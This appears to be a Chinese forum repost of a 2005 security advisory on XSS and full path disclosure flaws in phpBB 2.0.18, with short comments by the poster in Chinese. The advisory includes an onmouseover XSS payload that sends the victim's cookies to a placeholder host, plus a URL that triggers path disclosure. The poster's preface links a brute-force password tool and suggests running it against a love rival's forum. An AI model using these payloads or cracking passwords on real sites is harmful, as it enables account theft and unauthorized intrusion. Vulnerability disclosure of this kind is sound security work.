phpBB 2.0.18 XSS and Full Path Disclosure Details: SecurityAlert 还有一个是暴力破解的工具,
phpBB 2.0.18 XSS and Full Path Disclosure Details: SecurityAlert 还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码 下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar Topic : phpBB 2.0.18 XSS and Full Path Disclosure SecurityAlert Id : 269 SecurityRisk : Low Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Maksymilian Arciemowicz Date : 17.12.2005 Affected Software : phpBB <= 2.0.18 Advisory Text : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 16.12.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. XSS --- If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al low HTML: YES" or are you Guest that you can use this tags: " Onmouseover="alert('SecurityReason.Com')" X=" H E L O Exploit: " Onmouseover="alert(document.location='http://HOST/COOKIEs?'+document.COOKIE) " X=" H A L O and have you COOKIEs. - --- 2. Full Path Disclosure --- In file admin/admin_disallow.php is - -25-31--- if( !empty($setmodules) ) { $filename = basename(__FILE__); $module['Users']['Disallow'] = append_sid($filename); return; } - -25-31--- function append_sid() dosen't exists. And if you have: register_globals = On display_errors = On Try to go: http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 - -RESULT ERROR--- Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa llow.php on line 28 - -RESULT ERROR--- - --- 3. Greets --- sp3x - --- 4.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D /0u14EN2sQAh1Bwu0yvT48Q= =lsL8 -----END PGP SIGNATURE----- 哦,对了, 最上面那个好象也许大概似乎我猜是这个意思: 个性签名: 您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。 禁止HTML标签 允许风格标签 允许表情图标 找到可以“允许HTML标签”